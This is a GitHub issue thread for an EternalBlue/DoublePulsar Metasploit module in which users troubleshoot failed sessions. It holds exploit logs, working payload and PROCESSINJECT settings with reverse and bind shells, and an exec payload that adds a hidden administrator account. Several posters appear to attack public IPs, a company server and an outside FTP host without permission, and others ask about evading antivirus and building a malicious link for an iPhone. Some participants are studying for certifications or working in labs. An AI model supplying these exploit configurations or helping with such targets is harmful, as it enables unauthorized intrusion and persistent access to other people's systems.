Telefonica / Eternalblue-Doublepulsar-Metasploit

Module of Metasploit to exploit the vulnerability Eternalblue-Doublepulsar.
GNU Lesser General Public License v2.1
1.09k stars 520 forks source link

[] Exploit completed, but no session was created. #22

Open adalenv opened 7 years ago

adalenv commented 7 years ago

] Started reverse TCP handler on 192.168.195.129:4444 [] 192.168.1.150:445 - Generating Eternalblue XML data [] 192.168.1.150:445 - Generating Doublepulsar XML data [] 192.168.1.150:445 - Generating payload DLL for Doublepulsar [] 192.168.1.150:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll [] 192.168.1.150:445 - Launching Eternalblue... [+] 192.168.1.150:445 - Pwned! Eternalblue success! [] 192.168.1.150:445 - Launching Doublepulsar... [+] 192.168.1.150:445 - Remote code executed... 3... 2... 1... [] Exploit completed, but no session was created.

RubyistCTRLDYT commented 7 years ago

What is your processinject and targetarch

adalenv commented 7 years ago

explorer.exe win64

Auxilus commented 7 years ago

I have the same problem ... Plz help me ..

iNoSec commented 7 years ago

There is a problem with meterpreter... Try this: set payload windows/x64/shell_reverse_tcp and after launch exploit

make a Ctrl+Z for background the shell and after use post/multi/manage/shell_to_meterpreter session -l set session 1or whatyouhave and done ;)

testernoobkali commented 7 years ago

i am having the issue! no fix :(

abi1915 commented 6 years ago

arch *86 processinject lsaas..BUt no session is created..

786deogo commented 6 years ago

hey guyz if anyone got exploit completed but no session created error means u have the wrong payload for 64bit processinject explorer.exe and the payload is windows/x64/meterpreter/bind_tcp

it worked for me

hackituria commented 6 years ago

using Isass.exe and explorer.exe and reverse_tcp or bind_tcp I show the same error:

[] IP - Generating Eternalblue XML data [] IP - Generating Doublepulsar XML data [] IP - Generating payload DLL for Doublepulsar [] IP - Writing DLL in /root/.wine/drive_c/eternal11.dll [] IP - Launching Eternalblue... [+] IP - Backdoor is already installed [] IP - Launching Doublepulsar... [+] IP .168.1.150:445 - Remote code executed... 3... 2... 1... [] Exploit completed, but no session was created.

What can I do?

kislow commented 6 years ago

It really depends on the target device. For example if one is trying to exploit windows 7 whereas the target system is a windows xp or vista then you'll end up getting (...but no session was created).

Ensure that you carefully read your port scan results to see what OS the target could be...! If you're not too sure, then try out different target ID's and Target Architectures in your msfconsole.

windows xp = PROCESSINJECT = lsass.exe
TARGETARCHITECTURE = x86 Target ID = 0 set payload windows/meterpreter/reverse_tcp

windows 7 = PROCESSINJECT = lsass.exe
TARGETARCHITECTURE x64
Target ID = 8 set payload windows/x64/meterpreter/reverse_tcp


y2jnick008 commented 6 years ago

Just changing the processinject worked for me

rlim0x61 commented 6 years ago

I was facing the same issue but when I set my PROCESSINJECT to lsass.exe, then It worked perfectly.

set PROCESSINJECT lsass.exe

etcshadow1 commented 6 years ago

I'm having the same issue....

msf auxiliary(scanner/smb/smb_ms17_010) > set rhosts 104.236.47.133 rhosts => 104.236.47.133 msf auxiliary(scanner/smb/smb_ms17_010) > run

[+] 104.236.47.133:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7600 [!] 104.236.47.133:445 - Host is likely INFECTED with DoublePulsar! - Arch: x86 (32-bit), XOR Key: 0x5E367352 [] Scanned 1 of 1 hosts (100% complete) [] Auxiliary module execution completed

Module options (exploit/windows/smb/eternalblue_doublepulsar):

Name Current Setting Required Description


DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Doublepulsar ETERNALBLUEPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Eternalblue PROCESSINJECT explorer.exe yes Name of process to inject into (Change to lsass.exe for x64) RHOST 104.236.47.133 yes The target address RPORT 445 yes The SMB service port (TCP) TARGETARCHITECTURE x86 yes Target Architecture (Accepted: x86, x64) WINEPATH /root/.wine/drive_c/ yes WINE drive_c path

Payload options (windows/x64/shell_reverse_tcp):

Name Current Setting Required Description


EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.0.24 yes The listen address LPORT 4444 yes The listen port

Exploit target:

Id Name


8 Windows 7 (all services pack) (x86) (x64)

faizzaki212 commented 6 years ago

my target is exactly the same but when i change the PROCESSINJECT to explorer.exe, it works.

Srilekha26 commented 6 years ago

U may not have given the interaction command to the session i.e " sessions -i 1" or "sessions - i 2 " based on session number

rodribruno81 commented 5 years ago

Hello, antivirus (Avast) detect eternal11.dll file and close conection. Can you help me? Can I encodering dll?

stevouwill commented 5 years ago

please I encounter this error "Waiting up to 180 seconds for exploit to trigger...[*] Exploit completed, but no session was created." when I try to exploit with metasploit on our company's windows server 2008 this vulnerbility at https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-050 . Curiously I haved successfully exploit the same vulnerability on my VMware local windows 2008 local machine. Please I don't understand why it does not successfully exploit it from my kaly Virtual machine can you help me

villa1 commented 5 years ago

i use this instead reverse conection set payload windows/x64/exec set cmd net user jokowijongostulen GenerasiHongos1 /add

then rerun the exploit but change the cmd command to add the user as administrator

saadibabar commented 5 years ago

hey guyz if anyone got exploit completed but no session created error means u have the wrong payload for 64bit processinject explorer.exe and the payload is windows/x64/meterpreter/bind_tcp

it worked for me

It worked for me aswell.

BasilBSD commented 4 years ago

hey guyz if anyone got exploit completed but no session created error means u have the wrong payload for 64bit processinject explorer.exe and the payload is windows/x64/meterpreter/bind_tcp it worked for me

It worked for me aswell.

Thank you, ive been reading alot for that past 4 days, and this helped, I am working on my OSCP

Azreal-75 commented 4 years ago

Hi All, I'm new to pen testing but have been in IT for a long time and after being on a CSTM course a few weeks back I'm studying for the exam and have run into this issue.

I'm attempting to run a distcc exploit against the 'Lame' server on www.hackthebox.eu - it's one of the easier servers apparently but I'm having no luck getting a session created off the back of the exploit.

I'm attempting the exploit based upon nessus finding a critical vulnerability: Debian OpenSSH/OpenSSL Package Random Number Generator Weakness

I'm working from a Kali VM (VirtualBox) and have a VPN established to the HTB environment so can run nmap, nessus etc without issue but can't seem to get the exploit to run successfully and I'm not sure why.

VirtualBox is running on my Windows 10 laptop and I'm accessing the internet through the corporate network in work - I'm hoping that's irrelevant due to the VPN that's established but can't rule it out as networking isn't my strong point but I'm working on it.

Many thanks to anyone who might be able to help. :)

mkrajmk809 commented 4 years ago

There is maybe another solution .Just Shut off Your attacking OS Firewall it will be worked fine. It's problem arising because of your firewall inbound traffic setting. And also some other problem is your lhosts Insure that you correctly setup your lhost ip. Hope it will be work

ruslan051 commented 4 years ago

There is a problem with meterpreter... Try this: set payload windows/x64/shell_reverse_tcp and after launch exploit

make a Ctrl+Z for background the shell and after use post/multi/manage/shell_to_meterpreter session -l set session 1or whatyouhave and done ;)

don`t work, "Exploit completed, but no session was created"

Josuehz commented 4 years ago

also remember to run apache2 in a different terminal sudo systemctl start apache2

sealsgirl commented 3 years ago

Okay I have a question and I am fairly new to all this. I have been using Kali for about 2 months just because I am very interested in the system. I am going to school for my Computer Science degree and I need a little guidance. So I want to create a payload and listener as well as a malicious picture link for an iPhone 11 pro max. I try to create the payload and listener using the Set Tool Kit but always seem to get the same thing with error above. Would someone be kind enough to tell me step by step what exactly i need to do to create this. The target device is not on my network so I know I will have to do a port forward but for some reason my netgear router never seems to open the port. Also I dont know if the network with my Virtual Box is set up properly to allow outgoing and incoming connections. Any help would be appreciated greatly. Thank you guys [] Processing /root/.set/reports/powershell/powershell.rc for ERB directives. resource (/root/.set/reports/powershell/powershell.rc)> use multi/handler resource (/root/.set/reports/powershell/powershell.rc)> set payload windows/meterpreter/reverse_https payload => windows/meterpreter/reverse_https resource (/root/.set/reports/powershell/powershell.rc)> set LPORT 444 LPORT => 444 resource (/root/.set/reports/powershell/powershell.rc)> set LHOST 0.0.0.0 LHOST => 0.0.0.0 resource (/root/.set/reports/powershell/powershell.rc)> set ExitOnSession false ExitOnSession => false resource (/root/.set/reports/powershell/powershell.rc)> exploit -j [] Exploit running as background job 0. [] Exploit completed, but no session was created. msf5 exploit(multi/handler) > [] Started HTTPS reverse handler on https://0.0.0.0:444

jainishrpandya commented 3 years ago

I was facing the same issue but when I set my PROCESSINJECT to lsass.exe, then It worked perfectly.

set PROCESSINJECT lsass.exe

RegisT-os commented 3 years ago

[] File generated! Now you need to move the odt file and find a way to send it/open it with LibreOffice on the target. [+] librefile.odt stored at /root/.msf4/local/librefile.odt [] Started bind TCP handler against 10.0.2.15:8080 [*] Exploit completed, but no session was created.

Hey so I'm trying to try on this old CVE on last year. CVE-2019-9851. but so far I got no luck. I setup NAT Network for the Victim VM and also the Kali VM and still no luck for this. Anyone has any idea?

vaibhav-rm commented 3 years ago

I have the same problem msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 118.67.244.85:21 - Banner: 220- 220- Welcome to Net4 Secure FTP Server 220- To Upload Your Website Choose SSL Option 220- (FTP over explicit TLS/SSL) in Your FTP Client 220- PRocedure for SSL over FTP Setting for filezilla/cuteftp user: 220- http://www.net4.com/common/docs/ftps_filezilla.doc 220- http://www.net4.com/common/docs/ftps_cuteftp.doc 220- 220 Xlight FTP Server 3.8 ready... [] 118.67.244.85:21 - USER: 331 Password required for vFxBn:) [] Exploit completed, but no session was created. msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

zal-byte commented 3 years ago

It really depends on the target device. For example if one is trying to exploit windows 7 whereas the target system is a windows xp or vista then you'll end up getting (...but no session was created).

Ensure that you carefully read your port scan results to see what OS the target could be...! If you're not too sure, then try out different target ID's and Target Architectures in your msfconsole.

windows xp = PROCESSINJECT = lsass.exe TARGETARCHITECTURE = x86 Target ID = 0 set payload windows/meterpreter/reverse_tcp

windows 7 = PROCESSINJECT = lsass.exe TARGETARCHITECTURE x64 Target ID = 8 set payload windows/x64/meterpreter/reverse_tcp

i have problem with 'Unknown Command: PROCESSINJECT'

bingo1199 commented 1 year ago

Sadece processinject'i değiştirmek benim için çalıştı

How do I set up PROCESSINJECT lsass.exe

jainishrpandya commented 1 year ago

use this command set PROCESSINJECT lsass.exe

bingo1199 commented 1 year ago

hey guyz, herhangi biri istismarı tamamladıysa ancak oturum oluşturulmadı hatası, 64bit processinject explorer.exe için yanlış yüke sahip olduğunuz ve yükün windows/x64/meterpreter/bind_tcp olduğu anlamına gelir

benim için çalıştı does the same thing apply to android and what should i set PROCESSINJECT for android thanks

bingo1199 commented 1 year ago

bu komut kümesi PROCESSINJECT lsass.exe'yi kullanın****

does the same thing apply to android and what should i set PROCESSINJECT for android thanks